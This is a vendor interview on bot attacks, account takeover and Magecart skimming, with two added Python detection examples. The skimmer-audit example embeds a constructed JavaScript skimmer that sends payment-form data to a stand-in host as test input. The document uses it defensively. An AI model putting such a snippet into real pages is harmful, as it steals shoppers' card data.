Managing Bot-based Attacks with Threat Detection


As originally appeared in the TAG Cyber 2021 Security Annual report

Bot Attack and Threat Detection

The term “digital transformation” has been in the popular business lexicon for quite a while. In the wake of the COVID-19 pandemic, we’ve seen changes to the digital world that no one could have predicted, including a significant and sudden uptick in online transactions and interactions, all at a startling pace. Satya Nadella of Microsoft wrote, “In this era of remote everything, we have seen two years’ worth of digital transformation in two months.”

As the world has become more digital, businesses must transform their risk calculations, and one area that often gets overlooked is bot-based activity. Bot traffic mimics human visitors while automatically testing stolen username/password combinations (credential stuffing, the usual first step of account takeover) and stolen credit card numbers (carding) against websites. Card skimming used to mean a physical device attached to a point-of-sale terminal; it can now happen in the browser, anytime business is conducted online. Additionally, so-called shopping assistants offer coupons that distract shoppers from their path to purchase, sometimes redirecting shoppers to a competitor’s site for a similar product or the same one at a lower price.

Organizations need to recognize these hidden threats as they transform. To reduce cyber risk and to protect revenue, organizations are turning to application protection solutions such as those from PerimeterX. The company’s flagship product, PerimeterX Bot Defender, is a behavior-based bot management solution that helps stop bot attacks and keeps companies free from account takeover, carding, and operational disruption. We spoke with Ido Safruti, co-founder and CTO of PerimeterX, about why companies can’t forget about web-facing threats.

TAG Cyber: Attackers’ techniques are ever-changing. Are bots getting more sophisticated? How so?

Ido: Yes, bots have grown in sophistication over time, and attacks that used to happen only on the world’s largest websites are now happening on smaller, popular websites such as those for food and grocery delivery.

Since the beginning of the COVID pandemic, we have seen an increase in “sophisticated” attacks using tactics such as headless browsers and JavaScript-enabled bots. Sightings of bots with detailed business logic capabilities to navigate multiple pages and the ability to solve CAPTCHAs have increased, as have sophisticated account takeover (ATO) attacks against smaller targets. We have also seen an increase in botnets that are broadly distributed and have higher quality IP addresses, namely utilizing a large range of residential addresses.

It is likely that professional cybercrime rings responsible for sophisticated attacks are now broadening their targets to include more sites and smaller sites. It also appears that the tools to rent or create distributed botnets, as well as more sophisticated bot and ATO attacks, have gotten easier to use and become more widely available on the dark web.

TAG Cyber: What does that mean in terms of attack identification and mitigation?

Ido: Since attackers have shifted and found new techniques and more advanced tools, it will become harder to spot attacks early, and this will further reduce the efficacy of IP-address reputation as a way to spot bots. Now, it is more important than ever that businesses of all sizes use a sophisticated bot management tool that relies on behavioral analytics, advanced machine learning techniques, predictive models, and security research to block a wide range of sophisticated, automated attacks.

TAG Cyber: Bot Defender uses a combination of fingerprinting, behavioral analytics, and predictive models. How have you been able to extend its foundation to address more types of threats?

Ido: Because of the position Bot Defender plays in protecting the websites, web apps, and APIs of some of the largest e-commerce sites in the world, we are able to leverage the data and intelligence it gathers to address a variety of use cases.

Our Sensor collects and sends hundreds of client-side indicators and signals to the PerimeterX Detector. These signals are used to create baselines for validation of human versus bot activity, identification of suspicious script activity, and identification of malicious browser extensions. The Detector maintains a repository of known attacks across all protected properties, so malicious actions can be blocked quickly. Our Enforcer is the gatekeeper for threat response policies; it enriches and mitigates automated traffic according to business needs. These components are used across our current portfolio to protect enterprises from automated attacks and client-side threats like digital skimming and Magecart, as well as from browser malware.

From day one, our approach was to use the same infrastructure to support multiple solutions, so we built the PerimeterX Platform with extension in mind. It’s gratifying to see that vision and planning come to fruition. In support of this, we recently introduced PerimeterX Code Defender and PerimeterX Page Defender, which leverage the company’s Sensor-Detector-Enforcer approach to stop digital skimming and Magecart attacks and stop coupon assistants from disrupting your website visitors’ paths to purchase.
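The two answers above make one concrete point: a block list of IP addresses stops working once a botnet sits on clean residential addresses, while signals about how a session behaves (how fast it fails logins, how many usernames it tries, whether the page's JavaScript ran, whether an automation framework is present) still separate it from a person. The following is an added example written for this article, not PerimeterX code: a toy behaviour-based detector for credential-stuffing sessions placed next to the IP-reputation check it replaces. The log lines are constructed, the IP addresses are documentation ranges, and the client-side fields (`js_ran`, `webdriver`, `mouse_moves`) are assumed stand-ins for the kind of signal a sensor script would report; the thresholds are illustrative.

```python
"""Added example, not PerimeterX code: a toy behaviour-based detector for
credential-stuffing sessions, next to the IP-reputation check it replaces.
The log below is constructed; the client-side signals (js_ran, webdriver,
mouse_moves) are assumed stand-ins for what a sensor script would report."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    ts: float          # seconds since start of the capture
    ip: str
    session: str
    user: str          # username submitted to the login form
    ok: bool           # did the login succeed
    js_ran: bool       # assumed sensor signal: the page's JavaScript executed
    webdriver: bool    # assumed sensor signal: navigator.webdriver was true
    mouse_moves: int   # assumed sensor signal: pointer events before submit


# A real visitor: one username, one typo, then success, with pointer activity.
HUMAN = [
    Event(0.0, "198.51.100.10", "s-human", "alice", False, True, False, 14),
    Event(7.5, "198.51.100.10", "s-human", "alice", True, True, False, 9),
]
# A distributed botnet on clean residential IPs: each session cycles through
# leaked credential pairs from a headless browser, fast, with no pointer input.
BOTNET = [
    Event(i * 10 + j * 0.8, ip, f"s-bot{i}", f"user{j}", False, True, True, 0)
    for i, ip in enumerate(["192.0.2.21", "192.0.2.22", "192.0.2.23"])
    for j in range(6)
]
# One older-style bot from a listed IP that never runs the page's JavaScript.
KNOWN_BAD = [
    Event(1.0 + j, "203.0.113.7", "s-bad", f"victim{j}", False, False, False, 0)
    for j in range(4)
]
LOG = HUMAN + BOTNET + KNOWN_BAD

BAD_IPS = {"203.0.113.7"}  # hypothetical reputation list: only the old bot is on it


def ip_reputation_flags(events):
    """The legacy control: flag sessions whose IP is on a block list."""
    return {e.session for e in events if e.ip in BAD_IPS}


def window_max(timestamps, window):
    """Largest number of timestamps inside any sliding window of `window` seconds."""
    ts = sorted(timestamps)
    best = lo = 0
    for hi, t in enumerate(ts):
        while t - ts[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def behavioral_flags(events, max_failed_per_min=5, min_distinct_users=3):
    """Per-session behavioural scoring: returns {session: [reasons]} for sessions
    that look automated, regardless of where their IP address came from."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e.session].append(e)
    flagged = {}
    for sid, evs in by_session.items():
        reasons = []
        if len({e.user for e in evs}) >= min_distinct_users:
            reasons.append("many distinct usernames from one session")
        if window_max([e.ts for e in evs if not e.ok], 60) > max_failed_per_min:
            reasons.append("burst of failed logins")
        if any(e.webdriver for e in evs):
            reasons.append("webdriver flag set (automation framework)")
        if not all(e.js_ran for e in evs):
            reasons.append("page JavaScript never executed")
        if all(e.mouse_moves == 0 for e in evs):
            reasons.append("no pointer activity before submit")
        if reasons:
            flagged[sid] = reasons
    return flagged


def distributed_stuffing(events, window=60, min_ips=3):
    """Fleet-level signal: many distinct IPs failing logins in the same window.
    Catches low-volume sessions that would each pass per-session thresholds."""
    failing_ips = defaultdict(set)
    for e in events:
        if not e.ok:
            failing_ips[int(e.ts // window)].add(e.ip)
    return {b: len(ips) for b, ips in failing_ips.items() if len(ips) >= min_ips}


if __name__ == "__main__":
    print("IP reputation catches:", ip_reputation_flags(LOG))  # only s-bad
    for sid, why in sorted(behavioral_flags(LOG).items()):
        print(f"behavioral: {sid}: {', '.join(why)}")
    print("distributed stuffing windows:", distributed_stuffing(LOG))
```

On this log the reputation list flags only the one session on a listed address and misses all three residential-IP sessions; the behavioural scoring flags all four bot sessions and leaves the human alone, and the fleet-level check fires on the number of distinct addresses failing logins in one window, which is the signal that survives even when each individual session is kept below per-session thresholds. In production the thresholds would be learned per site (that is the "baseline" the Detector builds) rather than hard-coded, and the client-side fields would come from a sensor script rather than a dataclass.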

TAG Cyber: There are a variety of attack methods used on websites and web applications. What are you seeing most in customer environments?

Ido: Attack methods have grown in frequency and sophistication over the last few years. While we’ve seen a variety of attack methods of late, two rise to the top: ATO and digital skimming, often known as Magecart. In an ATO attack, attackers try to take credentials and control accounts to gain access to free content, personal information, credit card information, loyalty points, rewards, or other benefits. The number of ATO attacks hasn’t just risen proportionally—in some sectors we have seen a nearly 500% increase since the shelter-in-place directive went into effect across the world, while legitimate traffic was up only 25%. We’ve also seen an uptick in Magecart attacks in which malicious code is injected into a website’s code base to skim personal information such as email addresses, passwords, and credit card numbers from site visitors.
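A Magecart-style skimmer works because the injected script runs with the same privileges as the site's own code, so server-side controls never see it; what a site can do is know which scripts it ships and notice when that set changes. The following is an added example written for this article, not PerimeterX Code Defender: a script-inventory baseline check. It parses a page, records every external script host and a SHA-256 digest of every inline script body, and reports anything not present in the known-good baseline. Both pages, the hostnames and the skimmer snippet are constructed for the example.

```python
"""Added example, not PerimeterX Code Defender: a script-inventory baseline
check of the kind used against digital skimming. It parses a page, records
every external script host and a SHA-256 of every inline script, and reports
anything not seen in the known-good baseline. Both pages below are constructed."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptInventory(HTMLParser):
    """Collects <script src=...> URLs and hashes of inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).encode("utf-8")
            self.inline.append(hashlib.sha256(body).hexdigest())
            self._buf = None


def inventory(html):
    inv = ScriptInventory()
    inv.feed(html)
    inv.close()
    return inv


def audit(html, allowed_hosts, baseline_inline_hashes):
    """Return (kind, detail) findings for scripts absent from the baseline.
    A relative src (no host) is treated as same-origin and allowed."""
    inv = inventory(html)
    findings = []
    for src in inv.external:
        host = urlparse(src).hostname
        if host is not None and host not in allowed_hosts:
            findings.append(("unknown-external", src))
    for digest in inv.inline:
        if digest not in baseline_inline_hashes:
            findings.append(("unknown-inline", digest))
    return findings


# Constructed checkout page as deployed (the baseline).
LEGIT_INLINE = "window.dataLayer = window.dataLayer || []; dataLayer.push({page: 'checkout'});"
BASELINE_HTML = f"""<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-cdn.net/lib/checkout.js"></script>
<script>{LEGIT_INLINE}</script>
</head><body><form id="pay"><input name="cc"></form></body></html>"""

# Constructed skimmer injection: the same page plus a hook on the payment form
# that sends field values to a host the site never used.
SKIMMER = ("document.getElementById('pay').addEventListener('submit', function(e){"
           "var d=new FormData(e.target);navigator.sendBeacon('https://cdn-stats.example.net/c', d);});")
TAMPERED_HTML = BASELINE_HTML.replace(
    "</body>",
    f'<script src="https://cdn-stats.example.net/t.js"></script><script>{SKIMMER}</script></body>')

ALLOWED_HOSTS = {"cdn.example-cdn.net"}            # hosts the site legitimately loads from
BASELINE_HASHES = set(inventory(BASELINE_HTML).inline)  # taken from the known-good page

if __name__ == "__main__":
    print("baseline:", audit(BASELINE_HTML, ALLOWED_HOSTS, BASELINE_HASHES))
    for kind, detail in audit(TAMPERED_HTML, ALLOWED_HOSTS, BASELINE_HASHES):
        print(f"{kind}: {detail}")
```

The baseline page audits clean; the tampered page produces two findings, the unlisted external host and the inline hash the baseline has never seen. The same inline digests can be handed to the browser as a Content-Security-Policy `script-src` hash list so an injected inline script is refused rather than merely reported, and the external allow list maps directly onto `script-src` host entries. A fetch-time baseline like this one only sees what the server sends; a skimmer introduced by a compromised third-party script at runtime needs the same inventory taken inside the browser, which is what the client-side sensor approach in the interview is for.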

TAG Cyber: Why is the platform approach important in today’s environment?

Ido: Leaders in digital businesses are looking to leverage the capabilities of a trusted vendor and to gain synergies by working with solutions that can address multiple challenges. Consolidation of point products onto a single cloud-native platform gives the team managing application security visibility into the broader threat landscape, a single dashboard for web analytics, as well as data that is correlated and enriched for more thorough analysis. This approach saves teams from manual correlation and helps them make accurate decisions quickly. Increased efficiency means that DevOps and SecOps teams can focus their efforts on value-added services and bringing new applications to market more quickly. Ultimately, it frees valuable technical resources to focus on growth.

For more on bot protection, visit the PerimeterX Learning Center. For more on the current state of security and threat mitigation, download the 2021 Security Annual report from TAG Cyber.
